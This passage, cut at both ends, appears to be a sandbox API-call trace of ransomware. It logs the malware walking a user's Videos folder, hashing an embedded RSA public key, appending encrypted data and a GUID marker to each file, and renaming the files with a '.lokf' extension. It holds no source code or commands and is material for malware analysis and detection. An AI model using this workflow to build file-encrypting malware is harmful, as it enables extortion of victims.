hFile=0x5cc, liDistanceToMove=0x43d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.310] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.310] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.311] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.311] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.311] CloseHandle (hObject=0x5cc) returned 1 [0059.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0059.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0059.312] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8MMWzVzn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8mmwzvzn.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8MMWzVzn.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8mmwzvzn.mp4.lokf")) returned 1 [0059.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.312] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.313] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b58340, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0xd9aec6a0, ftLastAccessTime.dwHighDateTime=0x1d4c5a6, ftLastWriteTime.dwLowDateTime=0xd9aec6a0, ftLastWriteTime.dwHighDateTime=0x1d4c5a6, nFileSizeHigh=0x0, nFileSizeLow=0xa1e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9P25HE-ZzsQt.mkv", cAlternateFileName="9P25HE~1.MKV")) returned 1 [0059.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.313] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9P25HE-ZzsQt.mkv") returned=".mkv" [0059.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9P25HE-ZzsQt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9p25he-zzsqt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.313] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=41447) returned 1 [0059.313] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.316] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa1c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.316] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.317] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa1e7, lpOverlapped=0x0) returned 1 [0059.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.317] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.318] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.318] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.318] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.318] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.318] GetLastError () returned 0x0 [0059.318] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.318] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.318] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.318] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.318] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.318] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.319] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa1e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.319] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.319] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.319] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.319] CloseHandle (hObject=0x5cc) returned 1 [0059.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.320] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9P25HE-ZzsQt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9p25he-zzsqt.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9P25HE-ZzsQt.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9p25he-zzsqt.mkv.lokf")) returned 1 [0059.321] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.321] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0059.321] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4372100, ftCreationTime.dwHighDateTime=0x1d4d4e8, ftLastAccessTime.dwLowDateTime=0xe5687140, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0xe5687140, ftLastWriteTime.dwHighDateTime=0x1d4ce5b, nFileSizeHigh=0x0, nFileSizeLow=0xce11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GIpLP30n0FbK.mkv", cAlternateFileName="GIPLP3~1.MKV")) returned 1 [0059.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.321] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GIpLP30n0FbK.mkv") returned=".mkv" [0059.321] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GIpLP30n0FbK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\giplp30n0fbk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.322] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=52753) returned 1 [0059.322] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.324] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xcdeb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.324] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.325] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xce11, lpOverlapped=0x0) returned 1 [0059.325] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.325] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.325] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.325] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.326] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.326] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.326] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.326] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.326] GetLastError () returned 0x0 [0059.326] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.326] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.326] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.326] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.326] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.326] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.327] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.327] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xce11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.327] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.327] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.327] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.327] CloseHandle (hObject=0x5cc) returned 1 [0059.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.328] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GIpLP30n0FbK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\giplp30n0fbk.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GIpLP30n0FbK.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\giplp30n0fbk.mkv.lokf")) returned 1 [0059.329] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x5c61f380, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x5c61f380, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jYsvlZ", cAlternateFileName="")) returned 1 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x310) returned 0x32947b0 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329ba68 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329ba00 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b6c0 [0059.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269838 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32694f0 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b1e0 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32696d0 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b658 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bda8 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329be10 [0059.330] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df21e80, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0x81f3b8c0, ftLastAccessTime.dwHighDateTime=0x1d4ca43, ftLastWriteTime.dwLowDateTime=0x81f3b8c0, ftLastWriteTime.dwHighDateTime=0x1d4ca43, nFileSizeHigh=0x0, nFileSizeLow=0x8d57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="otAFCyQ0nHxWrUo d.mkv", cAlternateFileName="OTAFCY~1.MKV")) returned 1 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.330] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\otAFCyQ0nHxWrUo d.mkv") returned=".mkv" [0059.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\otAFCyQ0nHxWrUo d.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\otafcyq0nhxwruo d.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.330] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=36183) returned 1 [0059.330] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.333] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8d31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.333] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.334] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8d57, lpOverlapped=0x0) returned 1 [0059.334] lstrlenA (lpString="-----BEGIN PUBLIC 